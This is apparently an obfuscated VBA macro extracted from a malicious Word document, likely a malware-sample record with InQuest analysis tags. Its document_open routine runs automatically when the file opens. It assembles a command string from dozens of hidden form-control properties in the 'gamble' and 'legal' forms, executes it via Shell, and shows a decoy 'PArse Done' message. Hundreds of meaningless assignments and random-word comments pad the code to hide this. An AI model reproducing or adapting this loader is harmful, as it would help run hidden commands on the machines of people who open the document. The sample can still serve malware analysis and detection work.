Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub document_open()
gamble.Apreinterpretative_Oscyphoi = legal.Athurify_Oantiutilitarianism + legal.Aliquify_Oclover + gamble.Apulture_Oamalgam
legal.Abalboas_Osherifs.Width = 590
'Aasians_Obrahmin
legal.Amultiplicational_Orameal.Width = 451

    keftiu_Acalumny = "melanosarcomatosis_Abalawa+guanos_Aineradicableness"


legal.Acedrin_Opyjamas = legal.Apersian_Obonked + gamble.Agonadal_Osubgens + legal.Aunselfconsciously_Osectionalization

    phages_Apremove = "curler_Aunfeel+invoked_Aequitemporaneous"

gamble.Areclang_Osoftest.Left = 77
legal.Adozens_Oshamois.Left = 124

gamble.Acroquet_Ojebels = legal.Adatival_Ouptrail + gamble.Anorfolk_Oblepharemphysema + gamble.Abioptic_Ochakdar

    voling_Aaudibly = "unhoed_Acriant+ennuied_Akintry"

gamble.Areclang_Osoftest.Left = 77
legal.Adozens_Oshamois.Left = 124
legal.Asenile_Osarong.TabStop = True
gamble.Acoulie_Oheftily.Left = 30
gamble.Aplotlib_Oworser.Left = 86

gamble.Aoleous_Oassayer = gamble.Aguariba_Ostoreen + legal.Avagient_Oinmore + gamble.Ascarts_Osylphs

    bauxite_Atubulet = "ozonium_Apastour+photoconductivity_Aoverrepresentation"

gamble.Areclang_Osoftest.Left = 77
legal.Adozens_Oshamois.Left = 124
legal.Asenile_Osarong.TabStop = True
gamble.Acoulie_Oheftily.Left = 30
gamble.Aplotlib_Oworser.Left = 86

    swaged_Asitcoms = "millman_Ahemming+domajig_Acounterindentation"

legal.Awitham_Onuncle.TabStop = True
gamble.Acounterdogmatism_Ogneiss.Width = 942

legal.Acaprock_Oknuffe = gamble.Asendal_Olunata + gamble.Aterritorialisation_Ohandier + legal.Astroth_Omillnia

    electrotitration_Aunoptimistically = "foined_Ainvoke+skeets_Avulvate"

gamble.Areclang_Osoftest.Left = 77
legal.Adozens_Oshamois.Left = 124
legal.Asenile_Osarong.TabStop = True
gamble.Acoulie_Oheftily.Left = 30
gamble.Aplotlib_Oworser.Left = 86

    oscine_Alowest = "scurry_Apasewa+manlily_Ahazzan"

legal.Awitham_Onuncle.TabStop = True
gamble.Acounterdogmatism_Ogneiss.Width = 942

    gowning_Alowish = "blight_Aintends+nipper_Ashiatsu"

gamble.Aepinine_Oguttler.Left = 78
legal.Aduplexs_Obyously.TabStop = True

gamble.Adefrost_Otigerly = legal.Aneuroleptanalgesic_Ofevered + gamble.Atridii_Oascill + gamble.Aperitoneopericardial_Ounreconcilableness
legal.Aunoptimistically_Olaputan.TabStop = True
'Aoutdoor_Oantievolutionary
gamble.Aboneen_Onorther.Width = 551

    defraud_Atrisect = "isoster_Areindoctrination+soapsud_Aripple"

'Auniaxal_Ovielle

gamble.Aconable_Oupclimb = legal.Aalgorab_Obilked + gamble.Ajubardy_Oglasser + gamble.Apreface_Oeddish
legal.Aunoptimistically_Olaputan.TabStop = True
'Aoutdoor_Oantievolutionary
gamble.Aboneen_Onorther.Width = 551

    thoracogastroschisis_Aprinted = "mispick_Acoaxers+belout_Ablepharosphincterectomy"

'Auniaxal_Ovielle
legal.Aaerial_Ophotochemigraphy.TabStop = True
gamble.Apurrel_Oaythya.Width = 341

    buffed_Aourali = "seedbed_Aleprosy+lithos_Apraetor"

'Apseudofoliaceous_Ohommack

legal.Aorally_Osinaite = legal.Achicker_Oborshts + legal.Atapetum_Opunalua + legal.Amaggots_Ocherna
legal.Aunoptimistically_Olaputan.TabStop = True
'Aoutdoor_Oantievolutionary
gamble.Aboneen_Onorther.Width = 551

    hotrods_Asuperdubiousness = "abators_Acaymans+deirid_Aupsets"

'Auniaxal_Ovielle
legal.Aaerial_Ophotochemigraphy.TabStop = True
gamble.Apurrel_Oaythya.Width = 341

    eupathy_Aingate = "valuers_Aprovent+idistic_Asapium"

'Apseudofoliaceous_Ohommack
legal.Afundamentalistic_Ooutwoe.Width = 195
legal.Agodlier_Oenticer.Width = 372
'Aempery_Opereia
legal.Astretto_Ostroyed.TabStop = True

gamble.Aoutsing_Osomaticovisceral = gamble.Atouted_Ostints + legal.Aobtest_Ooutfame + gamble.Ahamburg_Otorahs
legal.Aunoptimistically_Olaputan.TabStop = True
'Aoutdoor_Oantievolutionary
gamble.Aboneen_Onorther.Width = 551

    amuyong_Atieless = "rebone_Awizzens+delace_Atriage"

'Auniaxal_Ovielle
legal.Aaerial_Ophotochemigraphy.TabStop = True
gamble.Apurrel_Oaythya.Width = 341

    spattee_Adeicer = "jinked_Aincontrovertibleness+embusqu_Asoapily"

'Apseudofoliaceous_Ohommack
legal.Afundamentalistic_Ooutwoe.Width = 195
legal.Agodlier_Oenticer.Width = 372
'Aempery_Opereia
legal.Astretto_Ostroyed.TabStop = True

    totient_Afroglet = "ununderstandability_Abaking+bolete_Atransmigrationism"


    arustle_Aisobath = "nowhit_Anonphilanthropic+shortsightedness_Aevelong"

gamble.Athyroarytenoideus_Oquadritubercular.TabStop = True

legal.Acurine_Owilded = gamble.Arampion_Obernese + legal.Apatulin_Oalares + legal.Areteach_Okyaung

    domoid_Anonrestrictively = "lither_Apotling+gelder_Aphenoxybenzamine"


    regroup_Aassary = "locknut_Aduennas+semiape_Asamovar"

legal.Athecata_Ochokes.Left = 83

gamble.Aslubber_Oagarose = legal.Ademoded_Oeinkorn + legal.Aknifers_Oalamode + gamble.Apreeducationally_Oamorist

    packers_Amuddleheadedness = "razers_Aupspew+candler_Adockman"


    besaile_Aadministrationist = "overmix_Afallacy+tabbed_Addname"

legal.Athecata_Ochokes.Left = 83

    jacobic_Abulchin = "hulkage_Ayttric+ortolan_Acamels"


    phoneticogrammatical_Auvulae = "russety_Aunhued+chitak_Acaranx"

'Ablowess_Onowhit

    eleuin_Ajingly = "sniggle_Afulvid+carapa_Adendron"


legal.Akegful_Ofurless = legal.Aexotica_Ohydroxytryptamine + legal.Aoverest_Omorbus + legal.Ahyperchlorhydria_Otumulus

    tjandi_Atested = "parecy_Apholido+apodan_Acobang"


    nonautobiographically_Athymey = "gristle_Alimace+impiety_Abrachiofaciolingual"

legal.Athecata_Ochokes.Left = 83

    unhave_Abeglic = "spinal_Aciboule+overway_Aalmuds"


    omahas_Avermin = "alannah_Awarray+boches_Adecream"

'Ablowess_Onowhit

    needham_Aslummed = "voidee_Arebuke+woundy_Amizmaze"

legal.Aunmitre_Otendido.TabStop = True
legal.Awetted_Omoggan.TabStop = True
'Apicule_Ohemichromatopsia
legal.Aulicon_Ofurison.Left = 124
'Amotors_Oeulamellibranchiate

legal.Auncommunicableness_Ometrophotography = legal.Auncontradictableness_Ogittern + gamble.Aspiran_Ospiles + legal.Aglycins_Ooatbin

    dobbies_Asesuto = "silures_Anailbin+values_Ahoaxes"


    bangles_Ahandbag = "isomers_Arootle+aloxite_Atoured"

legal.Athecata_Ochokes.Left = 83

    gooders_Awynris = "chocoan_Amesons+crenels_Akinless"


    tutees_Aoutrake = "positivistically_Aunparsimoniously+urology_Agarter"

'Ablowess_Onowhit

    ballot_Ahirsel = "semipsychological_Ainjoint+nonhygroscopically_Arelide"

legal.Aunmitre_Otendido.TabStop = True
legal.Awetted_Omoggan.TabStop = True
'Apicule_Ohemichromatopsia
legal.Aulicon_Ofurison.Left = 124
'Amotors_Oeulamellibranchiate
legal.Azendos_Ononrectangularly.Width = 1490
gamble.Astegnosisstegnotic_Osuperchivalrously.Left = 21
'Acartoon_Obagnes
legal.Acollate_Obesiren.Width = 1413

gamble.Aincorruptibilities_Oequaled = legal.Awhiffle_Okayaks + legal.Adudgeon_Osafawid + gamble.Agenros_Osarpler
legal.Astyloauricularis_Orippon.Left = 125
legal.Aactions_Ochalked.TabStop = True
gamble.Anonelaborateness_Obaroco.Width = 1275

gamble.Anobley_Oleucyl = gamble.Asubplat_Obugbite + gamble.Agazump_Ocashboy + gamble.Abigamic_Ounagile
legal.Astyloauricularis_Orippon.Left = 125
legal.Aactions_Ochalked.TabStop = True
gamble.Anonelaborateness_Obaroco.Width = 1275

    farfet_Aamasta = "overfancifulness_Apitiful+pallae_Atoplike"

gamble.Aancoly_Owhooped.TabStop = True
'Alactyl_Ophosphoaminolipide

    nonremediability_Anonmonarchically = "demain_Abeastly+frantic_Akrishna"


gamble.Awronger_Osterile = legal.Ajurisdictionally_Oyields + gamble.Abanyans_Onormal + gamble.Atusche_Oobclude
legal.Astyloauricularis_Orippon.Left = 125
legal.Aactions_Ochalked.TabStop = True
gamble.Anonelaborateness_Obaroco.Width = 1275

    sparker_Aslatch = "comaker_Asheals+baptize_Adryfist"

gamble.Aancoly_Owhooped.TabStop = True
'Alactyl_Ophosphoaminolipide

    ciliate_Abridged = "paiker_Aabseil+asleep_Aaxseeds"

legal.Abosons_Oevacue.Left = 146
'Apocosin_Oprovola
gamble.Aaidmen_Opoetise.Left = 144
'Abemoon_Omahmal
gamble.Atulisan_Okishke.TabStop = True
'Ahistomorphologically_Omingled

legal.Ascants_Oaeronef = legal.Adaddle_Otenuous + gamble.Anetball_Osuperindividualist + legal.Ahassel_Oruffer
legal.Astyloauricularis_Orippon.Left = 125
legal.Aactions_Ochalked.TabStop = True
gamble.Anonelaborateness_Obaroco.Width = 1275

    welshed_Aplural = "filago_Ajimmied+cindie_Apoleyne"

gamble.Aancoly_Owhooped.TabStop = True
'Alactyl_Ophosphoaminolipide

    veined_Amultidenticulate = "tattier_Anonterminableness+noncapriciousness_Aselter"

legal.Abosons_Oevacue.Left = 146
'Apocosin_Oprovola
gamble.Aaidmen_Opoetise.Left = 144
'Abemoon_Omahmal
gamble.Atulisan_Okishke.TabStop = True
'Ahistomorphologically_Omingled

    amylum_Aisomera = "surger_Apalaeotheriodont+terrar_Asobeit"

gamble.Aspicks_Omuggur.Left = 51
legal.Aopisthognathidae_Ogomavel.TabStop = True
'Aprestidigitatory_Ospring

legal.Aadevism_Othermoregulatory = gamble.Adisgage_Ojagless + legal.Aplasmic_Ohengest + legal.Abonnive_Ounsubstantialization
gamble.Aundispassionateness_Obetrend.Left = 61

    oorali_Anunning = "pewter_Alouder+kiddle_Afuthorc"

legal.Aatossa_Otruces.Left = 107

legal.Apurist_Omekbuda = gamble.Ainterapplication_Oherring + gamble.Ageotic_Omusers + legal.Aquerist_Omeadowy
gamble.Aundispassionateness_Obetrend.Left = 61

    troughy_Awrapup = "pinole_Anilled+spuffle_Amatawan"

legal.Aatossa_Otruces.Left = 107
gamble.Ascrophulariaceae_Ohalser.TabStop = True

    twelve_Aultraremuneration = "paulite_Achasten+slatch_Acaraibe"


    dissait_Aflaxen = "counted_Amacduff+levees_Aacrogen"


gamble.Awhatchy_Ointercontinental = gamble.Afigary_Ocellars + legal.Awoozier_Oprelect + gamble.Apterian_Osabred
gamble.Aundispassionateness_Obetrend.Left = 61

    presaw_Ascouter = "hanger_Acochromatography+dotiest_Arother"

legal.Aatossa_Otruces.Left = 107
gamble.Ascrophulariaceae_Ohalser.TabStop = True

    barbola_Apopify = "upfold_Araport+formel_Auncalculatedness"


    nauseam_Acropman = "agroan_Arouches+domina_Areslay"

gamble.Akedges_Ounproportionateness.Left = 105
legal.Aunivied_Oisopods.Width = 971
gamble.Apivots_Oheynne.Width = 355
'Acoalas_Okickish

gamble.Aafghans_Ocowhand = legal.Abarbre_Ononomad + legal.Achorda_Opensees + gamble.Adakotas_Otoyota
gamble.Aundispassionateness_Obetrend.Left = 61

    memory_Adaincha = "kickups_Abahama+poinado_Ahyperleucocytotic"

legal.Aatossa_Otruces.Left = 107
gamble.Ascrophulariaceae_Ohalser.TabStop = True

    earnie_Ajacate = "zaffree_Awashaki+frailer_Awritten"


    debacle_Aelectropotential = "haulers_Anoctis+seltzer_Adagged"

gamble.Akedges_Ounproportionateness.Left = 105
legal.Aunivied_Oisopods.Width = 971
gamble.Apivots_Oheynne.Width = 355
'Acoalas_Okickish

    dioxid_Aprogymnospermous = "jivaro_Aladron+darrell_Aslowing"

'Abegorra_Okalend

    boyards_Acoeline = "sattvic_Ademirep+eluates_Aalonzo"


    mopeder_Aunalert = "boloing_Aobject+gazebo_Aandron"


legal.Aleskea_Omispick = legal.Achipper_Osilicle + legal.Aunparsimoniously_Ocorial + legal.Apurfler_Olametta
legal.Alicence_Oevectic.TabStop = True
legal.Aarpents_Oanethol.Width = 1237
legal.Ahydrofluosilicic_Oapidae.TabStop = True

legal.Asporran_Okelder = gamble.Aoutroot_Opilfre + gamble.Aalgous_Oremarks + legal.Akithing_Oreerupt
legal.Alicence_Oevectic.TabStop = True
legal.Aarpents_Oanethol.Width = 1237
legal.Ahydrofluosilicic_Oapidae.TabStop = True
gamble.Afomento_Oambatch.TabStop = True
'Aflorets_Odosers
gamble.Asondes_Onongold.Left = 110
'Adeflow_Oaerope
legal.Agymsia_Olunaria.Left = 146

legal.Arusines_Ouproar = legal.Aphoneys_Ohelped + legal.Aupbound_Odextrosinistrally + legal.Apintos_Omyomere
legal.Alicence_Oevectic.TabStop = True
legal.Aarpents_Oanethol.Width = 1237
legal.Ahydrofluosilicic_Oapidae.TabStop = True
gamble.Afomento_Oambatch.TabStop = True
'Aflorets_Odosers
gamble.Asondes_Onongold.Left = 110
'Adeflow_Oaerope
legal.Agymsia_Olunaria.Left = 146
legal.Amukden_Omoorage.Width = 1416
legal.Airrefrangibleness_Oundescriptiveness.Width = 504
legal.Aunrests_Obestrid.Width = 764

gamble.Abytalk_Oshalako = gamble.Aoolong_Ogainer + gamble.Adiffund_Odighted + gamble.Acopaiye_Obeldam
legal.Alicence_Oevectic.TabStop = True
legal.Aarpents_Oanethol.Width = 1237
legal.Ahydrofluosilicic_Oapidae.TabStop = True
gamble.Afomento_Oambatch.TabStop = True
'Aflorets_Odosers
gamble.Asondes_Onongold.Left = 110
'Adeflow_Oaerope
legal.Agymsia_Olunaria.Left = 146
legal.Amukden_Omoorage.Width = 1416
legal.Airrefrangibleness_Oundescriptiveness.Width = 504
legal.Aunrests_Obestrid.Width = 764
gamble.Acolugos_Oshippo.Left = 100
gamble.Apillows_Ofelsite.TabStop = True
gamble.Aappast_Oadeste.Left = 27

gamble.Abebump_Omawmish = gamble.Aastigmatoscopies_Oinflue + gamble.Aovercivilization_Ointerrogatedness + gamble.Avamper_Ohollock
gamble.Anonsuppositional_Opiller.Left = 70
'Aarmings_Osevery
gamble.Alamiter_Opagods.TabStop = True
gamble.Acarotte_Otamper.TabStop = True

legal.Amukluk_Ochicos = legal.Awindel_Omarmion + legal.Adumping_Ooneida + legal.Acoccyx_Ocharmer
gamble.Anonsuppositional_Opiller.Left = 70
'Aarmings_Osevery
gamble.Alamiter_Opagods.TabStop = True
gamble.Acarotte_Otamper.TabStop = True
legal.Aaeolid_Omilvago.Width = 928
legal.Acanting_Ogestate.Left = 86
legal.Asuavest_Orapider.Width = 1379

legal.Aeelshop_Oferring = gamble.Asumatra_Ocataphoretically + legal.Asheers_Oynambu + legal.Acacked_Omerles
gamble.Anonsuppositional_Opiller.Left = 70
'Aarmings_Osevery
gamble.Alamiter_Opagods.TabStop = True
gamble.Acarotte_Otamper.TabStop = True
legal.Aaeolid_Omilvago.Width = 928
legal.Acanting_Ogestate.Left = 86
legal.Asuavest_Orapider.Width = 1379
gamble.Aintraphilosophic_Opolony.Width = 461
legal.Asesquih_Odeluged.TabStop = True
legal.Acavemen_Orosing.Left = 145

legal.Achinik_Opolioencephalomyelitis = legal.Anahani_Otapeta + legal.Aosteochondrofibroma_Osupersuspiciousness + legal.Abeguile_Ohirsled
gamble.Anonsuppositional_Opiller.Left = 70
'Aarmings_Osevery
gamble.Alamiter_Opagods.TabStop = True
gamble.Acarotte_Otamper.TabStop = True
legal.Aaeolid_Omilvago.Width = 928
legal.Acanting_Ogestate.Left = 86
legal.Asuavest_Orapider.Width = 1379
gamble.Aintraphilosophic_Opolony.Width = 461
legal.Asesquih_Odeluged.TabStop = True
legal.Acavemen_Orosing.Left = 145
legal.Amidmorn_Ofriezer.TabStop = True
legal.Alurched_Ocloaks.Left = 41
'Adagesh_Ogrinnie

    decrew_Aurosome = "reunion_Azincate+unecclesiastically_Asqudge"


gamble.Adelapse_Ogoethe = legal.Aoctile_Oanthine + gamble.Aaussies_Oscogie + gamble.Aimpoor_Obashers
legal.Aalives_Opearter.Width = 1083
'Atazzas_Oovalize
gamble.Aquivers_Obowwow.Width = 611

    unmarry_Apatmian = "clausal_Alawful+malates_Aembowed"


gamble.Aberyls_Odewani = legal.Anoilage_Ochirms + gamble.Aalkenes_Olocoed + gamble.Akamansi_Oharmon
legal.Aalives_Opearter.Width = 1083
'Atazzas_Oovalize
gamble.Aquivers_Obowwow.Width = 611

    myopes_Aaerates = "oophore_Ajaegars+odylic_Apiragua"

legal.Alithous_Osplayer.Width = 285
gamble.Ablepharoadenitis_Obailiff.Width = 577
gamble.Asalome_Oevaders.Width = 1002

gamble.Agenipap_Omalaya = legal.Ahaybox_Otepache + gamble.Agelated_Osunspot + gamble.Azufolo_Ocaccias
legal.Aalives_Opearter.Width = 1083
'Atazzas_Oovalize
gamble.Aquivers_Obowwow.Width = 611

    drammed_Aderobe = "rooting_Aarpens+vitasti_Abaddie"

legal.Alithous_Osplayer.Width = 285
gamble.Ablepharoadenitis_Obailiff.Width = 577
gamble.Asalome_Oevaders.Width = 1002
legal.Aphilosophicotheological_Ozincked.Width = 923
gamble.Aeluted_Ohypercryesthesia.TabStop = True
gamble.Abellies_Omeantes.Width = 1103
'Aintersubjectively_Olocker

legal.Apetary_Oarbust = legal.Asharpie_Oenolase + legal.Asomite_Opomona + legal.Amourner_Ouncaked
legal.Aalives_Opearter.Width = 1083
'Atazzas_Oovalize
gamble.Aquivers_Obowwow.Width = 611

    gloams_Aelaine = "wedbed_Aineradicableness+coypous_Aamazulu"

legal.Alithous_Osplayer.Width = 285
gamble.Ablepharoadenitis_Obailiff.Width = 577
gamble.Asalome_Oevaders.Width = 1002
legal.Aphilosophicotheological_Ozincked.Width = 923
gamble.Aeluted_Ohypercryesthesia.TabStop = True
gamble.Abellies_Omeantes.Width = 1103
'Aintersubjectively_Olocker
legal.Awaxman_Opostconvalescents.Width = 105
legal.Adecamp_Ofuzils.TabStop = True
legal.Aglozed_Oreynard.Width = 870

legal.Ainclusa_Onutria = legal.Acobbier_Ocytost + legal.Aproarbitrationist_Omanhunt + legal.Awidener_Osecpar
legal.Atartro_Ohospita.TabStop = True
'Avolapuk_Ooverconservatively
legal.Atankie_Oamphide.Width = 21
legal.Aedenize_Ospeans.TabStop = True
'Adeoxyribonucleic_Ohereof

gamble.Adeviser_Oequals = gamble.Afirman_Osuperinfluencing + gamble.Aschizogregarinae_Oprimage + gamble.Awending_Ooilery
legal.Atartro_Ohospita.TabStop = True
'Avolapuk_Ooverconservatively
legal.Atankie_Oamphide.Width = 21
legal.Aedenize_Ospeans.TabStop = True
'Adeoxyribonucleic_Ohereof

    responsibilities_Aredarn = "lamprel_Aethnogeographically+webbing_Agitter"

'Atheelol_Othruout
gamble.Acasabas_Oseatang.Left = 116
gamble.Aproletarianising_Okilters.Left = 65

legal.Abollix_Ovirific = gamble.Atittery_Obizonia + legal.Ameharis_Oupbreak + legal.Aretina_Ostoicheiometrically
legal.Atartro_Ohospita.TabStop = True
'Avolapuk_Ooverconservatively
legal.Atankie_Oamphide.Width = 21
legal.Aedenize_Ospeans.TabStop = True
'Adeoxyribonucleic_Ohereof

    mudcaps_Anonsystematically = "saccharometabolic_Ascreich+rubbler_Athanage"

'Atheelol_Othruout
gamble.Acasabas_Oseatang.Left = 116
gamble.Aproletarianising_Okilters.Left = 65

    tritely_Amangold = "carotic_Asaltfat+hackman_Apianosa"

'Anerves_Oglenoid

    reeled_Awlecche = "unsuperfluousness_Aveiler+sandbug_Apinards"

legal.Areverie_Obruges.Width = 1456



    gnetum_Acorsets = "aruspex_Afoeture+ditone_Adroopy"

gamble.Asexuous_Ochueta = gamble.Apreinterpretative_Oscyphoi
legal.Acheerly_Oneutral = legal.Acedrin_Opyjamas + gamble.Acroquet_Ojebels + gamble.Aoleous_Oassayer + legal.Acaprock_Oknuffe
gamble.Alyncid_Okinkly = gamble.Adefrost_Otigerly + gamble.Aconable_Oupclimb + legal.Aorally_Osinaite + gamble.Aoutsing_Osomaticovisceral
legal.Atriazo_Owindily = legal.Acurine_Owilded + gamble.Aslubber_Oagarose + legal.Akegful_Ofurless + legal.Auncommunicableness_Ometrophotography
legal.Apimped_Oodious = gamble.Aincorruptibilities_Oequaled + gamble.Anobley_Oleucyl + gamble.Awronger_Osterile + legal.Ascants_Oaeronef
gamble.Anonconcentricity_Oideates = legal.Aadevism_Othermoregulatory + legal.Apurist_Omekbuda + gamble.Awhatchy_Ointercontinental + gamble.Aafghans_Ocowhand
gamble.Apigmeat_Ofollows = legal.Aleskea_Omispick + legal.Asporran_Okelder + legal.Arusines_Ouproar + gamble.Abytalk_Oshalako
legal.Ayachty_Okawaka = gamble.Abebump_Omawmish + legal.Amukluk_Ochicos + legal.Aeelshop_Oferring + legal.Achinik_Opolioencephalomyelitis
legal.Acoenobe_Otrankum = gamble.Adelapse_Ogoethe + gamble.Aberyls_Odewani + gamble.Agenipap_Omalaya + legal.Apetary_Oarbust
legal.Abagnut_Ounfoxed = legal.Ainclusa_Onutria + gamble.Adeviser_Oequals + legal.Abollix_Ovirific + legal.Abagnut_Ounfoxed
legal.Atartro_Ohospita.TabStop = True
'Avolapuk_Ooverconservatively
legal.Atankie_Oamphide.Width = 21
legal.Aedenize_Ospeans.TabStop = True
'Adeoxyribonucleic_Ohereof

    ethnomusicologically_Abrimful = "casein_Aoverlow+extrait_Awhiffs"

'Atheelol_Othruout
gamble.Acasabas_Oseatang.Left = 116
gamble.Aproletarianising_Okilters.Left = 65

    piedly_Awryneck = "ennuis_Adaystar+conuzor_Apolygon"

'Anerves_Oglenoid

    savages_Astereotypographer = "porions_Asnight+haemic_Aarchaeocyathidae"

legal.Areverie_Obruges.Width = 1456


hopkins = gamble.Asexuous_Ochueta + legal.Acheerly_Oneutral + gamble.Alyncid_Okinkly + legal.Atriazo_Owindily + legal.Apimped_Oodious + gamble.Anonconcentricity_Oideates + gamble.Apigmeat_Ofollows + legal.Ayachty_Okawaka + legal.Acoenobe_Otrankum + legal.Abagnut_Ounfoxed

    representationally_Amidriff = "fulness_Adanglin+quatres_Aopaquer"

legal.Atartro_Ohospita.TabStop = True
'Avolapuk_Ooverconservatively
legal.Atankie_Oamphide.Width = 21
legal.Aedenize_Ospeans.TabStop = True
'Adeoxyribonucleic_Ohereof

    haunty_Apupate = "ixiama_Alobbies+overply_Acrambos"

'Atheelol_Othruout
gamble.Acasabas_Oseatang.Left = 116
gamble.Aproletarianising_Okilters.Left = 65

    hestia_Azlotych = "candida_Aballers+polyrhythmically_Adrecks"

'Anerves_Oglenoid

    zelkova_Apyropus = "rioting_Anephews+winiest_Abrowzer"

legal.Areverie_Obruges.Width = 1456

Shell# hopkins, Adefeats_Oswifts

    graphoanalytical_Ahasped = "marica_Aternlet+cubbyu_Asiloing"

MsgBox "PArse Done"
legal.Atartro_Ohospita.TabStop = True
'Avolapuk_Ooverconservatively
legal.Atankie_Oamphide.Width = 21
legal.Aedenize_Ospeans.TabStop = True
'Adeoxyribonucleic_Ohereof

    obadiah_Asodamid = "hexamethylenamine_Aornith+haulers_Amarting"

'Atheelol_Othruout
gamble.Acasabas_Oseatang.Left = 116
gamble.Aproletarianising_Okilters.Left = 65

    eugeny_Asuborns = "remelts_Anonmathematically+kickout_Asubzone"

'Anerves_Oglenoid

    stylist_Amidband = "rhamnal_Arandom+showful_Auntranslatableness"

legal.Areverie_Obruges.Width = 1456

End Sub

Attribute VB_Name = "gamble"
Attribute VB_Base = "0{0503F1E4-83AB-44F0-B191-8151020C8973}{255E0F07-B98E-49FD-BE34-BE68DC3F7055}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "legal"
Attribute VB_Base = "0{FD2481F5-2AAF-4465-87F9-02C591B9ED34}{BE2880A3-7BE0-4FE2-9693-AB2FC8F7CAC7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' InQuest injected base64 decoded content
' ajZ&

INQUEST-PP=macro
